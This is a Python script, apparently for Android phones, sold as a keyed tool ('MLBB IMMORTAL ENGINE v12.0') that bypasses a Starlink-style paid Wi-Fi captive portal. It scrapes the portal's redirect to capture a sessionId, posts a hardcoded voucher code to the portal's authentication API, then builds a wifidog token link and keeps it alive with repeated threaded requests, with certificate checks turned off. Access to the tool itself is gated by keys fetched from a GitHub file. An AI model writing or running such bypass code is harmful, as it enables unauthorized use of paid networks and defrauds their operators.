import subprocess, requests, re, urllib3, time, threading, os, socket, uuid
from urllib.parse import urlparse, parse_qs, urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# --- [ SECTION 1: FIXED & ULTRA STABLE ID SYSTEM ] ---
def get_hwid():
    """ 
    бҖ–бҖҜбҖ”бҖәбҖёбҖӣбҖІбҖ· Brand бҖ”бҖІбҖ· Model бҖҖбҖӯбҖҜ бҖЎбҖҒбҖјбҖұбҖҒбҖ¶бҖ•бҖјбҖ®бҖё ID бҖ‘бҖҜбҖҗбҖәбҖ•бҖұбҖёбҖҷбҖҠбҖәбҒӢ
    """
    try:
        brand = os.popen("getprop ro.product.brand").read().strip()
        model = os.popen("getprop ro.product.model").read().strip()
        stable_id = f"{brand}-{model}".upper()
        
        if not brand or brand == "":
            node = uuid.getnode()
            return str(uuid.UUID(int=node)).split('-')[-1].upper()
            
        return stable_id
    except:
        return "V12-STABLE-USER"

# --- [ SECTION 2: STARLINK ENGINE ] ---
def immortal_pulse(auth_link, session):
    while True:
        try:
            session.get(auth_link, timeout=3, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
            socket.gethostbyname("1.1.1.1")
            time.sleep(0.3) 
        except: time.sleep(1)

def start_starlink_engine():
    main_session = requests.Session()
    while True:
        try:
            r = main_session.get("http://connectivitycheck.gstatic.com/generate_204", timeout=5)
            if r.status_code != 204:
                p_url = r.url
                r1 = main_session.get(p_url, timeout=5)
                match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
                n_url = urljoin(p_url, match.group(1)) if match else p_url
                r2 = main_session.get(n_url, timeout=5)
                sid = parse_qs(urlparse(r2.url).query).get('sessionId', [None])[0]
                if sid:
                    p_host = f"{urlparse(p_url).scheme}://{urlparse(p_url).netloc}"
                    main_session.post(f"{p_host}/api/auth/voucher/", json={'accessCode': '123456', 'sessionId': sid}, timeout=5)
                    gw = parse_qs(urlparse(p_url).query).get('gw_address', ['192.168.60.1'])[0]
                    port = parse_qs(urlparse(p_url).query).get('gw_port', ['2060'])[0]
                    auth_link = f"http://{gw}:{port}/wifidog/auth?token={sid}"
                    for _ in range(3):
                        threading.Thread(target=immortal_pulse, args=(auth_link, main_session), daemon=True).start()
            time.sleep(10)
        except: time.sleep(5)

# --- [ SECTION 3: MAIN UI & VERIFY ] ---
def main():
    os.system('clear')
    my_id = get_hwid() 
    
    print("\033[92mв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғ")
    print("\033[96m   вҡ”пёҸ  MLBB IMMORTAL ENGINE v12.0 (MASTER)  вҡ”пёҸ")
    print("\033[93m   STATUS: READY TO BYPASS STARLINK")
    print("\033[92mв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғв”Ғ\033[0m")
    print(f"\033[95m[ Your Device ID: {my_id} ]\033[0m\n")
    
    user_key = input("\033[93m[?] Enter Your Key: \033[0m").strip()

    print("\033[94m[*] Verifying Access...\033[0m")
    threading.Thread(target=start_starlink_engine, daemon=True).start()

    # Cache бҖҷбҖҖбҖ»бҖ”бҖәбҖ…бҖұбҖӣбҖ”бҖә Timestamp бҖ•бҖұбҖ«бҖ„бҖәбҖёбҖ‘бҖҠбҖ·бҖәбҖ‘бҖ¬бҖёбҖһбҖұбҖ¬ GitHub URL
    url = f"https://raw.githubusercontent.com/kophyo-ops/mlbb-v12/main/keys.txt?t={int(time.time())}"
    
    try:
        # Cache-Control Header бҖ‘бҖҠбҖ·бҖәбҖ•бҖјбҖ®бҖё бҖЎбҖһбҖ…бҖәбҖҶбҖҜбҖ¶бҖёбҖҖбҖӯбҖҜ бҖҗбҖӯбҖҜбҖҖбҖәбҖӣбҖӯбҖҜбҖҖбҖәбҖҶбҖҪбҖІбҖҡбҖ°бҖҒбҖјбҖ„бҖәбҖё
        r = requests.get(url, timeout=10, verify=False, headers={'Cache-Control': 'no-cache'})
        if r.status_code == 200:
            allowed_lines = r.text.splitlines()
            authorized = False
            for line in allowed_lines:
                line = line.strip()
                if ":" in line:
                    saved_key, saved_id = line.split(":")
                    if user_key == saved_key.strip() and my_id == saved_id.strip():
                        authorized = True
                        break
            
            if authorized:
                print("\033[92m\n[вң“] ACCESS GRANTED! BYPASS SUCCESS.\033[0m")
                while True: time.sleep(100)
            else:
                print("\033[91m\n[!] Error: Invalid Key or Device not registered!\033[0m")
                print(f"\033[90mDebug: ID {my_id} not found in keys.txt\033[0m")
                os._exit(0)
    except Exception as e:
        print(f"\033[91m\n[!] Connection Error: {e}\033[0m")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        os._exit(0)

